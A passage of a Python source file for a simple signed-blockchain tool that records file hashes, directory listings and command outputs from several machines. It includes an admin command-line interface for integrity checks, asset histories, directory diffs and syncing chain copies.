__repr__(self):\n return f'{self.__class__.__name__}({self.blocknumber}, {self.authorid})'\n\n def computeblocksig(self, skfile=None):\n ''' Compute signature over a populated block using author's signing_key\n\n Called from 
BlockChain.makenextblock(). This function is a method of\n Block() because it depends on an incomplete block i.e. a block that is\n in the process of being constructed, whereas the methods of\n BlockChain() mainly act upon existing blocks in the blockchain.\n\n All block properties, except block.sig, are serialized into a BytesIO\n object and the sig is computed on its value.\n\n Inputs:\n Path to a file containing the private signing key as bytes.\n\n Output:\n A base64 encoded signature\n '''\n if skfile is None:\n raise computeblocksigError(f'No block signing key specified')\n\n try:\n bytes_to_sign = self.bytestosign()\n except:\n raise computeblocksigError('No bytes to sign')\n\n try:\n with open(skfile, 'rb') as f:\n skbytes = f.read()\n sk = signing.SigningKey(skbytes)\n except:\n raise computeblocksigError(f'Unable to open signing key file {skfile}')\n\n try:\n signed = sk.sign(bytes_to_sign)\n signature = signed.signature\n except:\n raise computeblocksigError('Error creating signature')\n\n return b64encode(signature)\n\n def bytestosign(self):\n ''' Serialize block attributes for signing and verifying operations\n\n Constructs a bytes object over which a signature will be computed or verified.\n Concatenates pickles of all block attribute values except self.sig\n\n Output:\n Returns a serialized bytes object of concatenated pickles\n\n '''\n signlist = [self.blocknumber,\n self.authorid,\n self.previousblockhash,\n self.genesisblock,\n self.unixtime,\n self.datetime,\n self.tz,\n self.tzoffset,\n self.nonce,\n self.data,\n self.comment]\n\n return serialize(signlist)\n\n\nclass BlockChain:\n ''' class for blockchain\n\n This class defines the properties and methods of the blockchain.\n Only one instance of this class exists.\n This sole instance contains the entire blockchain.\n This instance object is saved as a pickle file.\n\n bc = BlockChain()\n bc.blocks.append(block)\n\n '''\n\n blocks = GenericDescriptor()\n blockcount = GenericDescriptor() # length of blockchain\n totaldatasize = GenericDescriptor()\n head = GenericDescriptor() # last block number\n\n\n def __init__(self):\n ''' only called to instantiate a new blockchain\n '''\n self.blocks = []\n self.blockcount = 0\n self.totaldatasize = None\n self.head = None\n self.addnewblock(self.genesis())\n\n\n def __repr__(self):\n return f'{self.__class__.__name__}({self.blockcount} blocks, head = {self.head})'\n\n\n def genesis(self):\n ''' constructs the genesis block\n\n Called by __init__ when instantiating a new blockchain\n\n Output:\n The signed genesis block\n\n '''\n try:\n genesisblock = Block()\n genesisblock.blocknumber = 0\n genesisblock.authorid = AUTHORIDGENESIS\n genesisblock.previousblockhash = 0\n genesisblock.genesisblock = True\n genesisblock.nonce = randbits(64)\n genesisblock.data = BlockData() # could be None\n genesisblock.unixtime = time()\n genesisblock.datetime = ctime(genesisblock.unixtime)\n genesisblock.tz = localtime(genesisblock.unixtime).tm_zone\n genesisblock.tzoffset = strftime('%z', localtime(genesisblock.unixtime))\n genesisblock.comment = f'Genesis block created by admin on {genesisblock.datetime}'\n genesisblock.sig = genesisblock.computeblocksig(skfile=SIGNINGKEYFILEGENESIS)\n except:\n raise genesisError('Error making genesis block')\n\n return genesisblock\n\n\n def makenextblock(self, block=None, authorid=None):\n ''' Constructs the next block to be added to blockchain\n\n Assigns values to block properties. 
Signing the block is performed by\n        assigning the computed signature to block.sig. This completes the\n        creation of a block, which can then be added to blockchain.\n\n        Called from main()\n\n        Input:\n            A block instance for which only .data attribute has been set in main()\n            The authorid identifying the author and signer of this block\n\n        Output:\n            A signed block that can be added to the blockchain\n\n        '''\n        if block is None or authorid is None:\n            raise makenextblockError('Cannot make next block without block and authorid')\n\n        try:\n            block.blocknumber = self.head + 1\n            block.authorid = authorid\n            block.previousblockhash = self.computeblockhash(self.blocks[self.head])\n            block.genesisblock = False\n            block.nonce = randbits(64)\n            block.unixtime = time()\n            block.datetime = ctime(block.unixtime)\n            block.tz = localtime(block.unixtime).tm_zone\n            block.tzoffset = strftime('%z', localtime(block.unixtime))\n            block.comment = f'Block created by {getuser()}@{gethostname()} on {block.datetime}'\n            block.sig = block.computeblocksig(skfile=f'{SIGNINGKEYFILEPREFIX}{block.authorid}')\n        except:\n            raise makenextblockError('Error making next block')\n\n        return block\n\n\n    def addnewblock(self, block):\n        ''' Append a new block to the blockchain\n\n        Verifies authenticity of previous block, bc[bc.head]\n        Called from main()\n\n        Input:\n            A complete signed block\n\n        Output:\n            The blockchain instance modified by the new appended block\n\n        Each author verifies the previousblockhash property and signature of\n        the head block before adding a new block to maintain the integrity of\n        the blockchain.\n\n        '''\n\n        # verify previousblockhash of head block\n        if self.blockcount > 1:\n            if self.verifypreviousblockhash(self.head):\n                print(f'{self.blocks[self.head]} block.previousblockhash verified.')\n            else:\n                raise addnewblockError(f'head.previousblockhash verification failed.') \n\n        # verify signature of head block\n        if self.blockcount > 0:\n            if self.verifyblocksig(block=self.blocks[self.head]):\n                print(f'{self.blocks[self.head]} signature verified')\n                print(f'Proceeding to add new block {block.blocknumber} by {block.authorid}')\n            else:\n                raise addnewblockError(f'signature verification of head block failed') \n\n        try:\n            self.blocks.append(block)\n            self.blockcount = len(self.blocks)\n            # consistency check\n            if self.blocks[-1].blocknumber == len(self.blocks) - 1:\n                self.head = self.blocks[-1].blocknumber\n            else:\n                raise addnewblockError('Blocknumber mismatch')\n        except:\n            raise addnewblockError('Error adding next block to bc')\n\n        return None\n\n\n    def computetotaldatasize(self):\n        ''' Compute total size of data bytes in blockchain\n\n        Sum of each block.data.asset.\n        Sum of each block.data.command.\n\n        Return a byte count as an integer\n        '''\n        # minimal completion (assumption): measure each block's pickled data\n        # payload, which covers both its assets and its commands\n        total = 0\n        for block in self.blocks:\n            total += len(serialize([block.data]))\n        self.totaldatasize = total\n        return total\n\n\n    def verifyblocksig(self, block=None):\n        ''' Verify block signature of a block on the bc\n\n        This is a blockchain method so we can verify the signature of any block\n        on the bc, whereas creating a block signature is a block instance\n        method because signing is part of block construction.\n\n        Input:\n            Path to the file containing the verification key\n            A block instance existing on the bc\n\n        Output:\n            Boolean True if signature verifies ok, otherwise\n            a signature verification error is raised.\n\n        '''\n        if block is not None:\n            # compute same serialized bytes object used to create signature\n            bytestoverify = block.bytestosign()\n        else:\n            raise verifyError('No block to verify')\n\n        vkfile = f'{VERIFYKEYFILEPREFIX}{block.authorid}'\n        try:\n            with open(vkfile, 'rb') as f:\n                vkbytes = f.read()\n            vkey = 
signing.VerifyKey(vkbytes)\n except:\n raise verifyError(f'Unable to open verify key file {vkfile}')\n\n try:\n verified = vkey.verify(bytestoverify, b64decode(block.sig))\n except:\n print(f'sig verify failed {vkfile}')\n return False\n else:\n return verified == bytestoverify\n\n\n def computeblockhash(self, block):\n ''' Compute hex-encoded hash of an existing block in blockchain\n \n Hash over the entire contents of an existing block\n\n Input:\n An existing block on the bc\n\n Output:\n Hex-encoded hash over block\n\n '''\n hashlist = [block.blocknumber,\n block.authorid,\n block.previousblockhash,\n block.genesisblock,\n block.unixtime,\n block.datetime,\n block.tz,\n block.tzoffset,\n block.nonce,\n block.data,\n block.comment,\n block.sig]\n\n return hashlib.sha3_224(serialize(hashlist)).hexdigest()\n\n\n def verifypreviousblockhash(self, blocknumber=None):\n ''' Verify block.previousblockhash property\n\n Computes hash of previous block and compare with block.previousblockhash\n\n Input:\n Blocknumber of block containing the .previousblockhash attribute value\n that we want to verify against a computed hash over the preceding block.\n \n Output:\n Boolean True (verification succeeded) or False (verification failed)\n\n '''\n if blocknumber is not None:\n if 0 < blocknumber < self.blockcount:\n calculated = self.computeblockhash(self.blocks[blocknumber - 1])\n recorded = self.blocks[blocknumber].previousblockhash\n return calculated == recorded\n else:\n raise verifypreviousblockhashError('Block number outside valid range')\n else:\n raise verifypreviousblockhashError('Block number not specified')\n\n\ndef serialize(iterable):\n ''' Serialize objects from iterable\n\n Each object from iterable is pickled and written to a BytesIO instance\n the value of which is returned as a bytes object.\n\n Input:\n An iterable of objects to be serialized\n\n Output:\n A bytes object containing the concatenated pickles\n\n '''\n binarystream = BytesIO()\n bw = BufferedWriter(binarystream)\n try:\n for item in iterable:\n bw.write(dumps(item, pickle.HIGHEST_PROTOCOL))\n bw.flush()\n except:\n raise serializeError('Error serializing into pickle')\n return binarystream.getvalue()\n\n\ndef filehash(path):\n ''' Compute a hash of a file\n '''\n if not os.path.isfile(path):\n raise filehashError(f'Path is not a file: {path}')\n try:\n with open(path, 'rb') as f:\n return hashlib.sha3_224(f.read()).hexdigest()\n except:\n raise filehashError(f'Unable to read file')\n\n\ndef main():\n\n\n p = argparse.ArgumentParser(description='Simulate a blockchain')\n subparsers = p.add_subparsers(required=True, dest='subcommand', title='mandatory subcommand')\n # subcommands\n p1 = subparsers.add_parser('newbc', help='create new blockchain')\n p2 = subparsers.add_parser('admin', help='administer a blockchain')\n p3 = subparsers.add_parser('agent', help='perform agent actions on blockchain')\n # mandatory arguments for agents\n g3 = p3.add_mutually_exclusive_group(required=True)\n g3.add_argument('--m1', help='add to blockchain as m1', action='store_true')\n g3.add_argument('--m2', help='add to blockchain as m2', action='store_true')\n g3.add_argument('--m4', help='add to blockchain as m4', action='store_true')\n # option arguments for admin functions\n p2.add_argument('--sync', help='determine latest blockchain for syncing', action='store_true')\n p2.add_argument('-p', '--printsummary', help='Print blockchain summary', action='store_true')\n p2.add_argument('-i', '--checkintegrity', help='Check blockchain integrity', 
action='store_true')\n p2.add_argument('-s', '--summarizeblock', help='Summarize a block', type=int, metavar='BLKNUM')\n p2.add_argument('-d', '--blockdata', help='Show block data details', type=int, metavar='BLKNUM')\n p2.add_argument('-r', '--dirasset', help='Show dir asset', nargs=2, metavar=('BLKNUM', 'ASSETID'))\n p2.add_argument('-f', '--fileasset', help='Show file asset', nargs=2, metavar=('BLKNUM', 'ASSETID'))\n p2.add_argument('-fw', '--filewholeasset', help='Show filewhole asset', nargs=2, metavar=('BLKNUM', 'ASSETID'))\n p2.add_argument('-fr', '--filewholeremote', help='Show filewholeremote asset', nargs=2, metavar=('BLKNUM', 'ASSETID'))\n p2.add_argument('-c', '--commandasset', help='Show command asset', nargs=2, metavar=('BLKNUM', 'ASSETID'))\n p2.add_argument('-rh', '--dirassethist', help='Show dir asset history', metavar='ASSETID')\n p2.add_argument('-fh', '--fileassethist', help='Show file asset history', metavar='ASSETID')\n p2.add_argument('-ch', '--cmdhist', help='Show command asset history', metavar='CMDID')\n p2.add_argument('-hc', '--hashchanges', help='Show where hashes have changed', metavar='AUTHOR')\n p2.add_argument('-dd', '--dirdiff', help='Show directory change', nargs=3, metavar=('ASSETID', 'BLKNUM1', 'BLKNUM2'))\n p2.add_argument('-hl', '--hashlist', help='Extract all unique file hashes', action='store_true')\n\n args = p.parse_args()\n\n\n def readassetlist(path):\n ''' Convert the assetlist csv file to instances of defined asset classes\n\n Reads ASSETLISTPATH csv file and converts each line to an instance\n of the known asset class represented by the line.\n\n Input:\n path to assetlist file on disk\n\n Output:\n a list containing asset instance objects whose baseclass is FileSystemAsset\n\n '''\n if not os.path.isfile(path):\n raise readassetlistError(f'Invalid ASSETLISTPATH: {path}')\n with open(path, newline='') as csvfile:\n reader = csv.DictReader(csvfile)\n assetinstances = []\n for asset in reader:\n kwargs = {}\n if asset['AssetType'] in ASSETTYPES and not asset['AssetID'].startswith('#'):\n # for assets where knowledge of last block is required\n if asset['AssetType'] in ASSETTYPESLASTBLOCK:\n kwargs['lastblock'] = lastblockbyauthor(authorid=AUTHORID)\n for k, v in asset.items():\n kwargs[k.lower()] = v\n # create instance of class, asset['AssetType'], passing kwargs\n assetinstances.append(eval(asset['AssetType'])(**kwargs))\n elif asset['AssetType'] not in ASSETTYPES:\n e = f'Unknown asset type {asset[\"AssetType\"]} in {path}'\n raise AssetTypeError(e)\n\n return assetinstances\n\n\n def readcommandlist(path):\n ''' Convert the commandlist csv file to instances of defined command classes\n\n Reads COMMANDLISTPATH csv file and converts each line to an instance\n of the known command class represented by the line.\n\n Input:\n path to commandlist file on disk\n\n Output:\n a list containing command instance objects whose baseclass is Command\n\n '''\n if not os.path.isfile(path):\n raise readcommandlistError(f'Invalid COMMANDLISTPATH: {path}')\n with open(path, newline='') as csvfile:\n reader = csv.DictReader(csvfile)\n commandinstances = []\n for command in reader:\n kwargs = {}\n if command['CmdType'] in COMMANDTYPES and not command['CmdID'].startswith('#'):\n # for commands where knowledge of last block is required\n if command['CmdType'] in COMMANDTYPESLASTBLOCK:\n kwargs['lastblock'] = lastblockbyauthor(authorid=AUTHORID)\n for k, v in command.items():\n kwargs[k.lower()] = v\n # create instance of class, command['CmdType'], passing 
kwargs\n commandinstances.append(eval(command['CmdType'])(**kwargs))\n elif command['CmdType'] not in COMMANDTYPES:\n e = f'Unknown command type {command[\"CmdType\"]} in {path}'\n raise CommandTypeError(e)\n\n return commandinstances\n\n\n def lastblockbyauthor(authorid=None):\n # get reference to last block written by author\n for block in reversed(bc.blocks):\n if block.authorid == authorid:\n return block\n\n\n def createnewblockchain():\n ''' Generate a new bc with genesis block\n\n Call via arg parser\n\n '''\n blockchaininstance = BlockChain()\n return blockchaininstance\n\n\n def loadblockchain(blockchainfile=BLOCKCHAINFILE):\n ''' read a pickle file which contains an entire blockchain\n this method should return the reconstructed blockchain object\n '''\n if not os.path.isfile(blockchainfile):\n raise loadblockchainError(f'Blockchain file not found')\n # print('Loading existing blockchain...')\n with open(blockchainfile, 'rb') as f:\n return load(f)\n\n\n def saveblockchain(blockchainfile=BLOCKCHAINFILE):\n ''' save blockchain to a pickle file\n '''\n with open(blockchainfile, 'wb') as f:\n dump(bc, f, pickle.HIGHEST_PROTOCOL)\n\n\n def printsummary():\n ''' print a summary of the current state of the blockchain\n '''\n print('\\n')\n print('=' * 100)\n print(f'{bc}')\n print(bc.__dict__)\n print('-' * 50)\n for block in bc.blocks:\n print(f'{block}')\n print(block.__dict__)\n print('-' * 50)\n print('\\n\\n')\n\n\n def createnewblock():\n ''' create a new block and write it to the blockchain\n\n Reads and parses the asset csv files and uses these asset instances\n to populate the new block and then appends it to blockchain.\n\n '''\n # read asset specification\n assetlist = readassetlist(ASSETLISTPATH)\n commandlist = readcommandlist(COMMANDLISTPATH)\n\n # create new block instance\n block = Block()\n\n # populate new block with asset data\n block.data = BlockData(assetlist, commandlist)\n\n # complete the block and add it to blockchain\n bc.addnewblock(bc.makenextblock(block=block, authorid=AUTHORID))\n\n\n def summarizeblock(blocknumber=None):\n ''' summarize a block\n '''\n if 0 <= blocknumber <= bc.head:\n print('\\n')\n print('-' * 30)\n print(f'summarizing {bc.blocks[blocknumber]}')\n print('-' * 30)\n print('\\n')\n\n for prop, val in bc.blocks[blocknumber].__dict__.items():\n print(f'{prop.lstrip(\"_\"):>20}: {repr(val):<40}')\n\n print(f' Assets')\n for k, v in bc.blocks[blocknumber].data.assets.items():\n print(f' {k} {repr(v)}')\n # print(v.__dict__)\n\n print('\\n')\n print(f' Commands')\n for k, v in bc.blocks[blocknumber].data.commands.items():\n print(f' {k} {repr(v)}')\n else:\n raise summarizeblockError(f'Invalid block number {blocknumber}')\n\n\n def checkintegrity(bc):\n ''' verifies integrity of blockchain\n\n Checks entire chain of block hashes and signature of every block\n\n '''\n print('\\n')\n print(f'checking blockchain integrity...')\n for block in reversed(bc.blocks):\n if not block.genesisblock:\n if bc.verifypreviousblockhash(blocknumber=block.blocknumber):\n print(f'{block}.previousblockhash verified.')\n else:\n raise checkintegrityError(f'{block}.previousblockhash verification failed.') \n \n if bc.verifyblocksig(block=block):\n print(f'{block} signature verified')\n else:\n raise checkintegrityError(f'{block} signature verification failed') \n\n\n def blockdata(blocknumber=None):\n ''' show more detail about a block's data payload\n '''\n if 0 <= blocknumber <= bc.head:\n print(f'details {bc.blocks[blocknumber]}...')\n print('\\n')\n\n print(f' 
Assets')\n for k, v in bc.blocks[blocknumber].data.assets.items():\n print(f' {k} {repr(v)}')\n print(f' {v.__dict__}')\n\n print('\\n')\n print(f' Commands')\n for k, v in bc.blocks[blocknumber].data.commands.items():\n print(f' {k} {repr(v)}')\n print(f' {v.__dict__}')\n else:\n raise blockdataError(f'Invalid block number {blocknumber}')\n\n\n def dirasset(blocknumber=None, assetid=None):\n ''' Extract a Directory asset from a specified block\n '''\n try:\n print(f'{bc.blocks[blocknumber]}, dirasset: {assetid}')\n print(f'Dir path = {bc.blocks[blocknumber].data.assets[assetid].assetpath}')\n print(f'Dir hash = {bc.blocks[blocknumber].data.assets[assetid].dirhash}')\n print(f'Dir listing = {bc.blocks[blocknumber].data.assets[assetid].dirlisting}')\n if bc.blocks[blocknumber].data.assets[assetid].dirhashes is not None:\n for hash, file in sorted(bc.blocks[blocknumber].data.assets[assetid].dirhashes, \\\n key=lambda tpl: tpl[1]):\n print(hash, file)\n except:\n raise dirassetError(f'Error extracting dir asset {assetid} from block {blocknumber}')\n\n\n def fileasset(blocknumber=None, assetid=None):\n ''' Extract a FileHashOnly asset from a specified block\n '''\n try:\n print(f'{bc.blocks[blocknumber]}, fileasset: {assetid}')\n print(f'assetpath = {bc.blocks[blocknumber].data.assets[assetid].assetpath}')\n print(f'hash = {bc.blocks[blocknumber].data.assets[assetid].hash}')\n except:\n raise fileassetError(f'Error extracting filehash asset {assetid} from block {blocknumber}')\n\n\n def filewholeasset(blocknumber=None, assetid=None):\n ''' Extract a FileWhole asset from a specified block\n '''\n try:\n print('\\n')\n print(f'{bc.blocks[blocknumber]}, fileasset: {assetid}')\n print(f'assetpath = {bc.blocks[blocknumber].data.assets[assetid].assetpath}')\n print(f'hash = {bc.blocks[blocknumber].data.assets[assetid].hash}')\n print(f'filecontent:\\n{bc.blocks[blocknumber].data.assets[assetid].filecontent}')\n except:\n raise filewholeassetError(f'Error extracting filewhole asset {assetid} from block {blocknumber}')\n\n\n def filewholeremote(blocknumber=None, assetid=None):\n ''' Extract a FileWholeRemote asset from a specified block\n '''\n try:\n print('\\n')\n print(f'{bc.blocks[blocknumber]}, fileasset: {assetid}')\n print(f'command = {bc.blocks[blocknumber].data.assets[assetid].command}')\n print(f'hash = {bc.blocks[blocknumber].data.assets[assetid].hash}')\n print(f'---------- filecontent ---------:')\n print(f'{bc.blocks[blocknumber].data.assets[assetid].filecontent}')\n except:\n raise filewholeremoteError(f'Error extracting filewholeremote asset {assetid} from block {blocknumber}')\n\n\n def commandasset(blocknumber=None, cmdid=None):\n ''' Extract a Command asset from a specified block\n '''\n try:\n print('\\n')\n print(f'{bc.blocks[blocknumber]}, commandasset: {cmdid}')\n print(f'{bc.blocks[blocknumber].data.commands[cmdid]}')\n print(f'command output:')\n print('-'*30)\n print(f'{bc.blocks[blocknumber].data.commands[cmdid].cmdoutput}')\n except:\n raise commandassetError(f'Error extracting command asset {cmdid} from block {blocknumber}')\n\n\n def dirassethist(assetid=None):\n ''' Extract history of a dir asset\n '''\n print('\\n')\n print(f'Extracting history of directory asset {assetid}')\n print('-'*60)\n try:\n for block in bc.blocks[1:]:\n if assetid in block.data.assets:\n print(f'block {block.blocknumber}: {block.data.assets[assetid]}')\n # if Directory asset, print dirhash and dirhashes\n if isinstance(block.data.assets[assetid], Directory):\n print(f'dirhash = 
{block.data.assets[assetid].dirhash}')\n print('.'*30)\n # if we have file hashes, print them\n if block.data.assets[assetid].dirhashes is not None:\n for hash, file in sorted(block.data.assets[assetid].dirhashes, \\\n key=lambda tpl: tpl[1]):\n print(hash, file)\n else:\n print(f'AssetID {assetid} not a dir asset')\n print('-'*60)\n except:\n raise dirassethistError('Error extracting history of file asset')\n\n\n def fileassethist(assetid=None):\n ''' Extract history of a file asset\n '''\n print('\\n')\n print(f'Extracting history of file asset {assetid}')\n print('-'*60)\n try:\n for block in bc.blocks[1:]:\n if assetid in block.data.assets:\n print(f'block {block.blocknumber}: {block.data.assets[assetid]}')\n print(f'{block.data.assets[assetid].hash}')\n # if FileWhole or FileWholeRemote asset, print filecontent\n if isinstance(block.data.assets[assetid], (FileWhole)):\n print(f'{block.data.assets[assetid].filecontent}')\n if isinstance(block.data.assets[assetid], (FileWholeRemote)):\n print(f'{block.data.assets[assetid].command}')\n print(f'{block.data.assets[assetid].filecontent}')\n print('-'*60)\n except:\n raise fileassethistError('Error extracting history of file asset')\n\n\n def cmdhist(cmdid=None):\n ''' Extract history of a command asset\n '''\n print('\\n')\n print(f'Extracting history of command asset {cmdid}')\n print('-'*60)\n try:\n for block in bc.blocks[1:]:\n if cmdid in block.data.commands:\n print(f'block {block.blocknumber}: {block.data.commands[cmdid]}')\n print('.'*30)\n print(f'{block.data.commands[cmdid].cmdoutput}')\n print('-'*60)\n except:\n raise cmdhistError(f'Error extracting history of command asset {cmdid}')\n\n\n def sync():\n ''' Determine latest blockchain\n\n Evaluates previously downloaded blockchain files\n from each machine and determines the latest (longest) one.\n Integrity of each blockchain is verified.\n\n Input:\n 3 files previously downloaded from each machine,\n\n blockchain_pickle_m1\n blockchain_pickle_m2\n blockchain_pickle_m4\n\n Output:\n The latest blockchain file for syncing back to all machines,\n\n blockchain_pickle\n\n '''\n\n bc1 = 'blockchain_pickle_m1'\n bc2 = 'blockchain_pickle_m2'\n bc4 = 'blockchain_pickle_m4'\n if not os.path.isfile(bc1):\n raise syncError(f'Unable to locate file {bc1}')\n if not os.path.isfile(bc2):\n raise syncError(f'Unable to locate file {bc2}')\n if not os.path.isfile(bc4):\n raise syncError(f'Unable to locate file {bc4}')\n\n files = {'bc1': bc1, 'bc2': bc2, 'bc4': bc4}\n heads = {}\n longest = 0\n for k, file in files.items():\n bc = loadblockchain(file)\n print(f'{\"===\":*^50}')\n print(f'checking integrity of {file}')\n checkintegrity(bc)\n heads[k] = bc.head\n longest = max(longest, heads[k])\n\n for k in heads.keys():\n if heads[k] == longest:\n latest = files[k]\n\n echo(f'latest blockchain identified: {latest}: {longest} blocks\\n')\n shutil.copy2(latest, BLOCKCHAINFILE)\n echo(f'{BLOCKCHAINFILE} ready for syncing\\n')\n\n\n def echo(print_this):\n with open(LOGFILE, 'a') as f:\n unixtime = time()\n datetime = ctime(unixtime)\n tz = localtime(unixtime).tm_zone\n tzoffset = strftime('%z', localtime(unixtime))\n f.write(f'{unixtime:<16.4f}{datetime:<25}{print_this}')\n\n\n def comparehashes(assetid=None, block1=None, block2=None):\n ''' Compare asset hash between two blocks\n\n Compares a single assetid's hash between 2 blocks\n Answers the question:\n Did the asset hash change from block1 to block2?\n\n Input:\n assetid of a FileSystemAsset\n Two separate blocks containing this assetid\n\n 
Output:\n True, if the hashes are equal\n False, if the hashes differ\n\n '''\n if assetid is None or block1 is None or block2 is None:\n raise comparehashesError('arguments not supplied')\n\n elif not (assetid in block1.data.assets and assetid in block2.data.assets):\n raise comparehashesError(f'AssetID {assetid} not in both blocks')\n\n elif not (isinstance(block1.data.assets[assetid], FileSystemAsset) and \\\n isinstance(block2.data.assets[assetid], FileSystemAsset)):\n raise comparehashesError(f'AssetID {assetid} must be same type in both blocks')\n\n else:\n if isinstance(block1.data.assets[assetid], Directory) and \\\n isinstance(block2.data.assets[assetid], Directory):\n return block1.data.assets[assetid].dirhash == block2.data.assets[assetid].dirhash\n else:\n return block1.data.assets[assetid].hash == block2.data.assets[assetid].hash\n\n\n def blocksbyauthor(authorid=None, bc=None):\n ''' Extract all blocks by authorid from blockchain\n\n Returns a list of all blocks written by authorid\n Used by enumerateassets()\n\n '''\n if authorid is None or bc is None:\n raise blocksbyauthorError('arguments not supplied')\n\n lstblocks = []\n for block in bc.blocks:\n if block.authorid == authorid:\n lstblocks.append(block)\n return lstblocks\n\n\n def enumerateassets(lstblocks):\n ''' Enumerate all assetids present in a list of blocks\n\n Returns a set of all unique assetids in the blocks\n\n Input:\n A list of blocks\n\n Output:\n A set of unique assetids found in the list, of the form,\n {(assetid, classname), ...}\n\n Used by main()\n\n '''\n if len(lstblocks) == 0:\n raise enumerateassetsError('List of blocks is empty')\n\n setofassets = set()\n for block in lstblocks:\n for assetid in iter(block.data.assets):\n setofassets.add((assetid, block.data.assets[assetid].__class__.__name__))\n return setofassets # set of tuples\n\n\n def assethashchanges(blocks=None, assetid=None):\n ''' Identify asset hash changes across a list of blocks\n\n Returns a list of blocknumbers where asset hash changed from prior\n block. The list of blocks is assumed to be in proper order of\n increasing block number. If we lay out the blocks ordered from left to\n right, then we use 2 pointers moving from the right end (latest block)\n thru to the left end (earliest block), to identify sequences of\n identical hashes. 
The start of each sequence is the block where the\n        hash has changed from the previous block (and previous sequence).\n\n        Input:\n            A list of blocks and an assetid\n\n        Output:\n            A list of those blocknumbers where assetid's hash changed\n\n        '''\n        if blocks is None or assetid is None:\n            raise assethashchangesError('args not supplied')\n\n        elif len(blocks) <= 1:\n            raise assethashchangesError('Need 2 or more blocks')\n\n        # initialize pointer i to index of last block in list\n        # i marks the end of a hash sequence\n        i = len(blocks) - 1\n\n        # initialize pointer j to the index of block before i\n        j = i - 1\n\n        # initialize a list of blocknumbers\n        # always include the first block\n        l = [blocks[0].blocknumber]\n\n        while j >= 0:\n            hashesmatch = comparehashes(assetid=assetid, block1=blocks[j], block2=blocks[i])\n            if hashesmatch:\n                # move j to previous block\n                j += -1\n            else:\n                # new hash sequence starts at block j+1\n                l.append(blocks[j + 1].blocknumber)\n                # move i to j, to mark end of prior hash sequence\n                i = j\n                # move j to previous block\n                j += -1\n\n        # loop always terminates with j < 0; return the collected blocknumbers\n        return l\n\n\n    def dirdiff(assetid=None, blknum1=None, blknum2=None):\n        ''' Shows the diff of a Directory asset between two blocks\n\n        Shows what changed in a Directory asset, assetid, from block.blknum1\n        to block.blknum2. The changes displayed are sourced from block.dirhashes.\n        The directory asset must have a non-empty dirhashes attribute in both blocks\n        because the comparison uses the list in this attribute.\n\n        Input:\n            an assetid which is a Directory asset\n            blocknumber, blknum1, of a block containing assetid\n            blocknumber, blknum2, of a block containing assetid\n\n        Output:\n            dict of dirhashes entries, added or removed,\n            from block blknum1 to block blknum2\n\n        '''\n        if assetid is None or blknum1 is None or blknum2 is None:\n            raise dirdiffError('args not supplied')\n\n        elif not assetid in bc.blocks[blknum1].data.assets:\n            raise dirdiffError(f'assetid {assetid} not in block {blknum1}')\n\n        elif not assetid in bc.blocks[blknum2].data.assets:\n            raise dirdiffError(f'assetid {assetid} not in block {blknum2}')\n\n        elif not isinstance(bc.blocks[blknum1].data.assets[assetid], Directory):\n            raise dirdiffError(f'block {blknum1}: assetid {assetid} not a Directory asset')\n\n        elif not isinstance(bc.blocks[blknum2].data.assets[assetid], Directory):\n            raise dirdiffError(f'block {blknum2}: assetid {assetid} not a Directory asset')\n\n        elif not blknum1 < blknum2:\n            raise dirdiffError('must have blknum1 < blknum2')\n\n        elif bc.blocks[blknum1].data.assets[assetid].dirhashes is None or \\\n                bc.blocks[blknum2].data.assets[assetid].dirhashes is None:\n            raise dirdiffError('Empty dirhashes attribute')\n\n\n        diff = {'removed': [], 'added': []}\n        # symmetric difference\n        s1 = set(bc.blocks[blknum1].data.assets[assetid].dirhashes)\n        s2 = set(bc.blocks[blknum2].data.assets[assetid].dirhashes)\n        symmdiff = s1 ^ s2\n\n        for entry in symmdiff:\n            if entry in s1:\n                diff['removed'].append(entry)\n            elif entry in s2:\n                diff['added'].append(entry)\n\n        return diff\n\n\n    def extractallfilehashes():\n        ''' Extract all unique file hashes per supplier\n\n        The output files can be used for checking against known hashes\n        Called from main()\n\n        Input:\n            Uses the currently loaded blockchain\n        Output:\n            Writes one text file per supplier containing unique file hashes\n            from the set of assets monitored by the supplier.\n\n        '''\n        supplierfilehashes = {}\n        for supplier in SUPPLIERS:\n            supplierfilehashes[f'{supplier}'] = set()\n        for block in bc.blocks[1:]:\n            for assetid, 
asset in block.data.assets.items():\n                if isinstance(asset, FileHashOnly):\n                    for supplier, hashset in supplierfilehashes.items():\n                        if block.authorid == supplier:\n                            hashset.add((asset.hash, asset.assetpath))\n                if isinstance(asset, Directory):\n                    if asset.dirhashes is not None and len(asset.dirhashes) > 0:\n                        for hash, path in asset.dirhashes:\n                            for supplier, hashset in supplierfilehashes.items():\n                                if block.authorid == supplier:\n                                    hashset.add((hash, path))\n\n        for supplier in iter(supplierfilehashes):\n            print('\\n')\n            print('-'*60)\n            print(f'{len(supplierfilehashes[supplier])} file hashes from supplier {supplier}:')\n            print('-'*60)\n            with open(f'{supplier}_hashes', 'a') as f:\n                i = 0\n                for hash, path in sorted(supplierfilehashes[supplier], key=lambda tpl: tpl[1]):\n                    f.write(f'{hash} {path}\\n')\n                    i += 1\n                print(f'{i} unique hashes written to {supplier}_hashes')\n            print('\\n')\n\n\n\n\n    # ########################################################################\n    # process command-line arguments\n    # ########################################################################\n\n\n    if args.subcommand == 'newbc':\n        print('Creating new blockchain...')\n        bc = createnewblockchain()\n        saveblockchain()\n        printsummary()\n\n    elif args.subcommand == 'agent':\n        if args.m1:\n            AUTHORID = 'm1'\n            ASSETLISTPATH = 'assetlist_m1'\n            COMMANDLISTPATH = 'commandlist_m1'\n            bc = loadblockchain()\n            createnewblock()\n            saveblockchain()\n            printsummary()\n\n        elif args.m2:\n            AUTHORID = 'm2'\n            ASSETLISTPATH = 'assetlist_m2'\n            COMMANDLISTPATH = 'commandlist_m2'\n            bc = loadblockchain()\n            createnewblock()\n            saveblockchain()\n            printsummary()\n\n        elif args.m4:\n            AUTHORID = 'm4'\n            ASSETLISTPATH = 'assetlist_m4'\n            COMMANDLISTPATH = 'commandlist_m4'\n            bc = loadblockchain()\n            createnewblock()\n            saveblockchain()\n            printsummary()\n\n    elif args.subcommand == 'admin':\n        AUTHORID = 'm0'\n\n        if args.sync:\n            sync()\n\n        if args.printsummary:\n            bc = loadblockchain()\n            printsummary()\n\n        if args.checkintegrity:\n            bc = loadblockchain()\n            checkintegrity(bc)\n\n        if args.summarizeblock is not None:\n            bc = loadblockchain()\n            summarizeblock(blocknumber=args.summarizeblock)\n\n        if args.blockdata is not None:\n            bc = loadblockchain()\n            blockdata(blocknumber=args.blockdata)\n\n        if args.dirasset:\n            bc = loadblockchain()\n            